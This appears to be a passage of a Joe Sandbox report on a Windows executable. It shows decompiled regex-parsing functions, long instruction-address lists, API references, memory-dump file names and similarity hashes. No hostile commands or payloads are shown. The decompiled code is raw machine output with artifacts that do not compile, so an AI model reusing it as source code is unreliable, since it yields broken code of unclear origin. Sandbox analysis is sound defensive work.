										__eax = __eax + 1;
										__eflags =  *(__ebp + 0x13) - 3;
										 *(__ebp + 8) = ( *(__ebp + 8) - 6 << 3) + __cl;
										 *__ebx = __eax;
										if( *(__ebp + 0x13) < 3) {
											continue;
										}
										break;
									}
									__eax =  *__edi;
									__ecx =  &(__esi[4]);
									__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									goto L95;
								}
								__eflags = __eax - 0xa;
								if(__eax < 0xa) {
									L50:
									__ecx =  *__edi;
									__edx =  &(__esi[4]);
									__eax = E00409C62(__eax,  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									E00406ED3(__ecx) =  *(__ebp - 0x28);
									 *__ebx =  *(__ebp - 0x28);
									goto L18;
								}
								__eflags = __eax - __esi[0xb];
								if(__eax >= __esi[0xb]) {
									goto L51;
								}
								goto L50;
							}
							__ecx =  *__edi;
							__eax = __eax - 1;
							__edx =  &(__esi[4]);
							 *__ebx = __eax;
							__al =  *__eax;
							__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							_t273 = __eax != 0;
							__eflags = _t273;
							__ecx = __ecx & 0xffffff00 | _t273;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L44;
						case 9:
							goto L18;
						case 0xa:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040811C();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xb:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004081D0();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xc:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00408154();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xd:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00408208();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xe:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004080D8();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xf:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040818C();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x10:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409B68(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x11:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409B87(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x12:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409BA6(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x13:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							_push( *__edi);
							_push(1);
							__eax = E00409A43();
							__esp = __esp + 0xc;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x14:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							_push( *__edi);
							_push(0);
							__eax = E00409A43();
							__esp = __esp + 0xc;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x15:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							__eax = E00409A9D(__ecx, __eflags);
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x16:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							__eax = E00409AD6(__ecx, __eflags);
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							L95:
							__eax = E00406ED3(__ecx);
							goto L18;
						case 0x17:
							__eax =  *__ebx;
							 *(__ebp - 0x28) = __eax;
							 *(__ebp + 0x10) = __eax;
							while(1) {
								__ecx = __esi[0x27];
								 *(__ebp + 8) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__edx =  ~__ecx & __eax;
								__eflags = ( ~__ecx & __eax) -  *__ebx;
								if(( ~__ecx & __eax) ==  *__ebx) {
									break;
								}
								__ecx = __esi[0x27];
								 *(__ebp + 8) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__ecx = __edi;
								__eax = E00406B23(__ecx, __ebx, __edx);
								__eflags = __eax;
								if(__eax == 0) {
									__ecx = __esi[0x27];
									 *(__ebp + 8) = __esi[0x27];
									__eax =  *0x41720c();
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									__eax =  *(__eax + 8);
									__edx = __ecx;
									__eax = __eax + __ecx;
									__edx =  ~__ecx;
									asm("sbb edx, edx");
									__edx =  ~__ecx & __eax;
									__eax =  *__ebx;
									__eflags = __edx - __eax;
									if(__edx != __eax) {
										__eax = __eax + 1;
										__eflags = __eax;
										 *__ebx = __eax;
									}
									L106:
									__eax =  *__ebx;
									 *(__ebp - 0x28) =  *__ebx;
									continue;
								}
								__eflags = __eax - 0x21;
								if(__eax == 0x21) {
									break;
								}
								goto L106;
							}
							__eax =  *(__ebp - 0x28);
							__eflags = __eax -  *(__ebp + 0x10);
							if(__eax !=  *(__ebp + 0x10)) {
								__edi =  *__edi;
								_push(__esi);
								_push(__edi);
								_push(__eax);
								_push( *(__ebp + 0x10));
								__eax = E0040A5B8();
								__ecx =  *(__ebp + 0xc);
								__esp = __esp + 0x10;
								__edx =  *(__ecx + 0x1c);
								 *( *(__ecx + 0x1c)) = __eax;
								 *(__ecx + 0x1c) = __eax;
							}
							goto L20;
						case 0x18:
							__al =  *((intOrPtr*)(__ebp + 0xf));
							_push(0);
							__ecx = __ebp - 0x74;
							 *(__ebp - 0x74) =  *((intOrPtr*)(__ebp + 0xf));
							__eax =  *0x417230();
							__esi = "quotemeta turned off, but was never turned on";
							_push(__esi);
							L004153D6();
							_pop(__ecx);
							_push(__eax);
							_push(__esi);
							__ecx = __ebp - 0x74;
							 *0x417234() = __ebp - 0x74;
							__ecx = __ebp - 0xf0;
							 *((char*)(__ebp - 4)) = 7;
							__eax = E00404FA7(__ebp - 0xf0, __ebp - 0x74);
							 *((intOrPtr*)(__ebp - 0xef7b)) =  *((intOrPtr*)(__ebp - 0xef7b)) - 1;
							goto [far dword [eax-0x8];
					}
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t568 + 0xc)) + 0x10)) != 0) {
						 *((char*)(_t568 - 0x1c)) =  *((intOrPtr*)(_t568 + 0xf));
						 *0x417230(0);
						_t567 = "mismatched parenthesis";
						 *0x417234(_t567, strlen(_t567));
						 *(_t568 - 4) = 2;
						E00404FA7(_t568 - 0x80, _t568 - 0x1c);
						_push(0x4196f8);
						_push(_t568 - 0x80);
						 *((intOrPtr*)(_t568 - 0x80)) = 0x417698;
						L004153FE();
					}
					 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
					E0040C5ED(_t568 - 0x30);
					 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
					E00406ED3(_t568 - 0x24);
					_t487 = 0;
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t568 - 0xc));
					return _t487;
				}
			}

0x004050bd
0x004050ca
0x004050ce
0x004050d2
0x004050d5
0x004050d8
0x004050db
0x004050de
0x004050e1
0x004050e4
0x004050e7
0x004050f1
0x004050fb
0x004050ff
0x0040510b
0x00405114
0x0040511a
0x00405194
0x00405197
0x004051ac
0x004051b4
0x004051b9
0x004051bc
0x00405321
0x00405321
0x00405325
0x00405327
0x0040532b
0x00405330
0x00405331
0x00405332
0x00405337
0x0040533a
0x0040533d
0x00405344
0x00405346
0x00405346
0x00405349
0x00405349
0x0040534c
0x0040534c
0x00405353
0x00405358
0x00405358
0x00405358
0x0040535f
0x00405364
0x00000000
0x00405364
0x004051c2
0x00000000
0x004051cc
0x004051cf
0x004051d5
0x004051d8
0x004051e4
0x004051e8
0x004051ea
0x00405252
0x00405255
0x00405258
0x00405259
0x00000000
0x00405259
0x004051ec
0x004051ef
0x004051f3
0x00000000
0x00000000
0x004051f8
0x004051fd
0x00405200
0x00405206
0x00405212
0x00405213
0x00405217
0x00405227
0x0040522b
0x00405230
0x0040523a
0x0040523f
0x00000000
0x00000000
0x004052f2
0x004052f9
0x004052fe
0x00405300
0x00405300
0x00405300
0x00405303
0x00405306
0x00405309
0x0040530d
0x00405310
0x00405315
0x00405318
0x0040531d
0x00000000
0x00000000
0x00405260
0x00405263
0x00405267
0x0040524b
0x0040524b
0x00000000
0x0040524b
0x00405269
0x0040526c
0x0040526e
0x00405271
0x00405274
0x0040527a
0x00405280
0x00405285
0x00405286
0x00405287
0x00405288
0x00405291
0x00405294
0x0040529b
0x0040529f
0x004052a4
0x004052ae
0x004052b3
0x00405245
0x00405245
0x00405246
0x00000000
0x00000000
0x004052bb
0x004052be
0x004052c2
0x004052c5
0x004052c8
0x004052ca
0x004052cc
0x004052d1
0x004052d1
0x004052d3
0x004052d3
0x004052da
0x004052df
0x004052e6
0x004052eb
0x00000000
0x00000000
0x00405377
0x00405379
0x0040537e
0x00405383
0x00405384
0x00405387
0x00405388
0x0040538a
0x0040538d
0x00405390
0x00405394
0x00405397
0x0040539c
0x00000000
0x00000000
0x004053a4
0x004053a6
0x004053ab
0x004053b0
0x004053b1
0x004053b4
0x004053b5
0x004053b7
0x004053ba
0x004053bd
0x004053c1
0x004053c4
0x004053c9
0x00000000
0x00000000
0x004053d1
0x004053d6
0x004053db
0x004053de
0x004053e1
0x004053e3
0x004053e7
0x00405400
0x00405400
0x004053e9
0x004053e9
0x004053ec
0x004053ef
0x004053f0
0x004053f5
0x004053f8
0x004053f8
0x00405402
0x00405404
0x00405407
0x0040540a
0x0040540d
0x00405411
0x00405414
0x00405418
0x0040541d
0x00405420
0x00405425
0x00405428
0x0040542b
0x00405431
0x00405435
0x00405438
0x0040543b
0x0040543d
0x0040543f
0x00405441
0x00405443
0x0040544b
0x00405450
0x00405452
0x00405455
0x00405456
0x00405457
0x0040545a
0x0040545f
0x00405462
0x00405465
0x00405467
0x0040546a
0x0040546d
0x00405471
0x00405474
0x00405479
0x0040547c
0x00405481
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00405491
0x00405496
0x00405497
0x0040549a
0x0040549b
0x0040549d
0x004054a0
0x004054a3
0x004054a7
0x004054aa
0x004054af
0x00000000
0x00000000
0x00405730
0x00405733
0x00405736
0x0040573c
0x0040573f
0x00405742
0x00405745
0x00405747
0x00405749
0x0040574b
0x0040574d
0x0040574f
0x00405751
0x00405753
0x00405790
0x00405792
0x00405795
0x004058a6
0x004058a6
0x004058a9
0x004058de
0x004058e1
0x0040597f
0x00405982
0x00405a4e
0x00405a51
0x00405a8c
0x00405a8c
0x00405a8f
0x00405aca
0x00405aca
0x00405acd
0x00405b08
0x00405b08
0x00405b0b
0x00405b43
0x00405b43
0x00405b46
0x00405b7e
0x00405b7e
0x00405b81
0x00405bc1
0x00405bc1
0x00405bc2
0x00405bc3
0x00405bc8
0x00405bc9
0x00405bcb
0x00405bcc
0x00405bfd
0x00405bff
0x00405c04
0x00405c06
0x00405c09
0x00405c11
0x00405c14
0x00405c16
0x00405c19
0x00405c1c
0x00405c20
0x00405c23
0x00405c28
0x00405bce
0x00405bce
0x00405bd0
0x00405bd6
0x00405bde
0x00405be1
0x00405be3
0x00405be6
0x00405be9
0x00405bed
0x00405bf0
0x00405bf5
0x00405bf5
0x00405784
0x00405784
0x00405789
0x00000000
0x00405789
0x00405b83
0x00405b87
0x00000000
0x00000000
0x00405b89
0x00405b8a
0x00405b8d
0x00405b8f
0x00405b95
0x00405b9d
0x00405ba0
0x00405ba2
0x00405ba2
0x00405ba2
0x00405ba5
0x00405ba8
0x00405bac
0x00405baf
0x00405bb4
0x00000000
0x00405bb4
0x00405b48
0x00405b4c
0x00000000
0x00000000
0x00405b4e
0x00405b4f
0x00405b52
0x00405b54
0x00405b5a
0x00405b62
0x00405b65
0x00405b67
0x00405b6a
0x00405b6d
0x00405b71
0x00405b74
0x00405b79
0x00000000
0x00405b79
0x00405b0d
0x00405b11
0x00000000
0x00000000
0x00405b13
0x00405b14
0x00405b17
0x00405b19
0x00405b1f
0x00405b27
0x00405b2a
0x00405b2c
0x00405b2f
0x00405b32
0x00405b36
0x00405b39
0x00405b3e
0x00000000
0x00405b3e
0x00405acf
0x00405ad3
0x00000000
0x00000000
0x00405ad5
0x00405ad6
0x00405ad9
0x00405adb
0x00405ae1
0x00405ae9
0x00405aec
0x00405aee
0x00405af1
0x00405af4
0x00405af8
0x00405afb
0x00405b00
0x00000000
0x00405b00
0x00405a91
0x00405a95
0x00000000
0x00000000
0x00405a97
0x00405a98
0x00405a9b
0x00405a9d
0x00405aa3
0x00405aab
0x00405aae
0x00405ab0
0x00405ab3
0x00405ab6
0x00405aba
0x00405abd
0x00405ac2
0x00000000
0x00405ac2
0x00405a53
0x00405a57
0x00000000
0x00000000
0x00405a59
0x00405a5a
0x00405a5d
0x00405a5f
0x00405a65
0x00405a6d
0x00405a70
0x00405a72
0x00405a75
0x00405a78
0x00405a7c
0x00405a7f
0x00405a84
0x00000000
0x00405a84
0x00405988
0x0040598b
0x0040598e
0x00405994
0x00405997
0x0040599a
0x0040599c
0x0040599f
0x004059a1
0x004059a3
0x004059a5
0x004059a7
0x004059a9
0x004059ab
0x004059ad
0x004059af
0x004059b2
0x004059b4
0x004059b7
0x004059ba
0x004059c0
0x004059c6
0x004059cb
0x004059cc
0x004059cd
0x004059ce
0x004059d7
0x004059da
0x004059e1
0x004059ea
0x004059f0
0x004059f5
0x004059f6
0x00405a00
0x00405a00
0x00405a05
0x00405a07
0x00405a08
0x00405a0a
0x00405a0c
0x00405a0e
0x00405a10
0x00405a12
0x00405a15
0x00405a16
0x00405a1c
0x00405a1c
0x00405a10
0x00405a1d
0x00405a1f
0x00405a23
0x00405a27
0x00405a2f
0x00405a32
0x00405a34
0x00405a37
0x00405a3a
0x00405a3e
0x00405a41
0x00405a46
0x00000000
0x00405a46
0x004058e7
0x004058eb
0x004058ef
0x004058ef
0x004058f0
0x004058f2
0x004058f2
0x004058f5
0x004058f8
0x004058fe
0x00405901
0x00405904
0x00405907
0x00405909
0x0040590b
0x0040590d
0x0040590f
0x00405911
0x00405913
0x00405915
0x00000000
0x00000000
0x00405917
0x00405919
0x0040591b
0x00405921
0x00405921
0x00405923
0x00405929
0x00405929
0x0040592b
0x00000000
0x00000000
0x0040592d
0x0040592f
0x00000000
0x00000000
0x00405931
0x00405932
0x00405938
0x0040593b
0x0040593e
0x00405940
0x00405943
0x00405945
0x00405949
0x0040594c
0x00000000
0x00000000
0x00000000
0x0040594c
0x00405925
0x00405927
0x00000000
0x00000000
0x00000000
0x00405927
0x0040591d
0x0040591f
0x00000000
0x00000000
0x00000000
0x0040591f
0x0040594e
0x00405950
0x00405958
0x00405960
0x00405963
0x00405965
0x00405968
0x0040596b
0x0040596f
0x00405972
0x00405977
0x00000000
0x00405977
0x004058ab
0x004058ac
0x004058af
0x004058b1
0x004058b7
0x004058bf
0x004058c2
0x004058c4
0x004058c7
0x004058ca
0x004058ce
0x004058d1
0x004058d6
0x00000000
0x004058d6
0x0040579b
0x0040579e
0x00000000
0x00000000
0x004057a4
0x004057a7
0x004057aa
0x004057ad
0x004057b3
0x004057bb
0x004057be
0x004057c1
0x004057c3
0x004057c5
0x004057c7
0x004057c9
0x004057cb
0x004057d0
0x004057d5
0x004057da
0x004057dd
0x00405822
0x00405822
0x00405826
0x00405826
0x00405826
0x0040582a
0x0040582a
0x0040582d
0x00405830
0x00405836
0x00405839
0x0040583c
0x0040583f
0x00405841
0x00405843
0x00405845
0x00405847
0x00405849
0x0040584b
0x0040584d
0x00000000
0x00000000
0x0040584f
0x00405851
0x00405854
0x00000000
0x00000000
0x00405856
0x00405859
0x00000000
0x00000000
0x00405866
0x00405869
0x0040586a
0x0040586e
0x00405871
0x00405873
0x00000000
0x00000000
0x00000000
0x00405873
0x00405875
0x00405877
0x0040587f
0x00405887
0x0040588a
0x0040588c
0x0040588f
0x00405892
0x00405896
0x00405899
0x0040589e
0x00000000
0x0040589e
0x004057df
0x004057e2
0x004057e9
0x004057e9
0x004057eb
0x004057f1
0x004057f9
0x004057fc
0x004057fe
0x00405801
0x00405804
0x00405808
0x0040580b
0x00405810
0x00405818
0x0040581b
0x00000000
0x0040581b
0x004057e4
0x004057e7
0x00000000
0x00000000
0x00000000
0x004057e7
0x00405755
0x00405757
0x00405758
0x0040575b
0x0040575d
0x00405762
0x0040576a
0x0040576d
0x0040576f
0x0040576f
0x0040576f
0x00405772
0x00405775
0x00405779
0x0040577c
0x00405781
0x00000000
0x00000000
0x00000000
0x00000000
0x00405571
0x00405573
0x00405578
0x0040557e
0x00405586
0x00405589
0x0040558b
0x0040558e
0x00405591
0x00405595
0x00405598
0x0040559d
0x00000000
0x00000000
0x004055a5
0x004055a7
0x004055ac
0x004055b2
0x004055ba
0x004055bd
0x004055bf
0x004055c2
0x004055c5
0x004055c9
0x004055cc
0x004055d1
0x00000000
0x00000000
0x00405641
0x00405643
0x00405648
0x0040564e
0x00405656
0x00405659
0x0040565b
0x0040565e
0x00405661
0x00405665
0x00405668
0x0040566d
0x00000000
0x00000000
0x00405675
0x00405677
0x0040567c
0x00405682
0x0040568a
0x0040568d
0x0040568f
0x00405692
0x00405695
0x00405699
0x0040569c
0x004056a1
0x00000000
0x00000000
0x004055d9
0x004055db
0x004055e0
0x004055e6
0x004055ee
0x004055f1
0x004055f3
0x004055f6
0x004055f9
0x004055fd
0x00405600
0x00405605
0x00000000
0x00000000
0x0040560d
0x0040560f
0x00405614
0x0040561a
0x00405622
0x00405625
0x00405627
0x0040562a
0x0040562d
0x00405631
0x00405634
0x00405639
0x00000000
0x00000000
0x004056a9
0x004056ab
0x004056ae
0x004056b0
0x004056b6
0x004056ba
0x004056bc
0x004056bf
0x004056c2
0x004056c6
0x004056c9
0x004056ce
0x00000000
0x00000000
0x004056d6
0x004056d8
0x004056db
0x004056dd
0x004056e3
0x004056e7
0x004056e9
0x004056ec
0x004056ef
0x004056f3
0x004056f6
0x004056fb
0x00000000
0x00000000
0x00405703
0x00405705
0x00405708
0x0040570a
0x00405710
0x00405714
0x00405716
0x00405719
0x0040571c
0x00405720
0x00405723
0x00405728
0x00000000
0x00000000
0x004054b7
0x004054b9
0x004054bc
0x004054bd
0x004054be
0x004054c0
0x004054c5
0x004054c8
0x004054cb
0x004054cd
0x004054d0
0x004054d3
0x004054d7
0x004054da
0x004054df
0x00000000
0x00000000
0x004054e7
0x004054e9
0x004054ec
0x004054ed
0x004054ee
0x004054f0
0x004054f5
0x004054f8
0x004054fb
0x004054fd
0x00405500
0x00405503
0x00405507
0x0040550a
0x0040550f
0x00000000
0x00000000
0x00405517
0x00405519
0x0040551c
0x0040551d
0x0040551e
0x00405523
0x00405524
0x00405527
0x00405528
0x0040552a
0x0040552d
0x00405530
0x00405534
0x00405537
0x0040553c
0x00000000
0x00000000
0x00405544
0x00405546
0x00405549
0x0040554a
0x0040554b
0x00405550
0x00405551
0x00405554
0x00405555
0x00405557
0x0040555a
0x0040555d
0x00405561
0x00405564
0x00405569
0x00405bb7
0x00405bb7
0x00000000
0x00000000
0x00405c30
0x00405c32
0x00405c35
0x00405c38
0x00405c38
0x00405c3b
0x00405c3e
0x00405c44
0x00405c47
0x00405c4a
0x00405c4d
0x00405c4f
0x00405c51
0x00405c53
0x00405c55
0x00405c57
0x00405c59
0x00000000
0x00000000
0x00405c5b
0x00405c5e
0x00405c61
0x00405c67
0x00405c6a
0x00405c6d
0x00405c70
0x00405c72
0x00405c74
0x00405c76
0x00405c78
0x00405c7e
0x00405c83
0x00405c85
0x00405c8e
0x00405c91
0x00405c94
0x00405c9a
0x00405c9d
0x00405ca0
0x00405ca3
0x00405ca5
0x00405ca7
0x00405ca9
0x00405cab
0x00405cad
0x00405caf
0x00405cb1
0x00405cb3
0x00405cb3
0x00405cb4
0x00405cb4
0x00405cb6
0x00405cb6
0x00405cb8
0x00000000
0x00405cb8
0x00405c87
0x00405c8a
0x00000000
0x00000000
0x00000000
0x00405c8c
0x00405cc0
0x00405cc3
0x00405cc6
0x00405ccc
0x00405cd1
0x00405cd2
0x00405cd3
0x00405cd4
0x00405cd7
0x00405cdc
0x00405cdf
0x00405ce2
0x00405ce5
0x00405cea
0x00405cea
0x00000000
0x00000000
0x00405cf2
0x00405cf5
0x00405cf7
0x00405cfa
0x00405cfd
0x00405d03
0x00405d08
0x00405d09
0x00405d0e
0x00405d0f
0x00405d10
0x00405d11
0x00405d1a
0x00405d1d
0x00405d24
0x00405d28
0x00405d2c
0x00405d32
0x00000000
0x0040511c
0x00405123
0x0040512d
0x00405130
0x00405136
0x00405147
0x00405154
0x00405158
0x00405160
0x00405165
0x00405166
0x0040516d
0x0040516d
0x00405172
0x00405179
0x0040517e
0x00405185
0x0040518a
0x00405366
0x0040536c
0x00405374
0x00405374

APIs

_EH_prolog.MSVCRT ref: 004050BD
strlen.MSVCRT ref: 0040513C
_CxxThrowException.MSVCRT(?,004196F8), ref: 0040516D
strlen.MSVCRT ref: 0040520C
_CxxThrowException.MSVCRT(00417698,004196F8), ref: 00405246
strlen.MSVCRT ref: 00405280

Strings

mismatched parenthesis, xrefs: 00405136, 0040513B, 00405143, 00405206, 0040520B, 00405213, 0040527A, 0040527F, 00405287

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: strlen$ExceptionThrow$H_prolog
String ID: mismatched parenthesis
API String ID: 1639010532-3804012542
Opcode ID: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
Instruction ID: dbdd704d0f857427ebeb39f116f656dece123dea06476c1553e1f9c4206b7acd
Opcode Fuzzy Hash: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
Instruction Fuzzy Hash: 1CD18F75905209DFCB04DFA4C995AEEBBB4EF44304F1080AEE816B7281DB78AE05CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00414977 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041497C
strlen.MSVCRT ref: 004149A8
_CxxThrowException.MSVCRT(?,004196F8), ref: 004149DA
toupper.MSVCRT ref: 004149FF
tolower.MSVCRT ref: 00414A21

Strings

invalid range specified in character set, xrefs: 004149A2, 004149A7, 004149AF

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentolowertoupper
String ID: invalid range specified in character set
API String ID: 1623458934-400550818
Opcode ID: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
Instruction ID: 8689beaf87658f235b18adbd55520a84ac800dc3010e3d19cb195d65f9f5d29c
Opcode Fuzzy Hash: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
Instruction Fuzzy Hash: A2313972540115AFCB04DF64D8916FD7BB4EF44361F10806FF966CA181C7B89A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC3E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BC43
strlen.MSVCRT ref: 0040BC6F
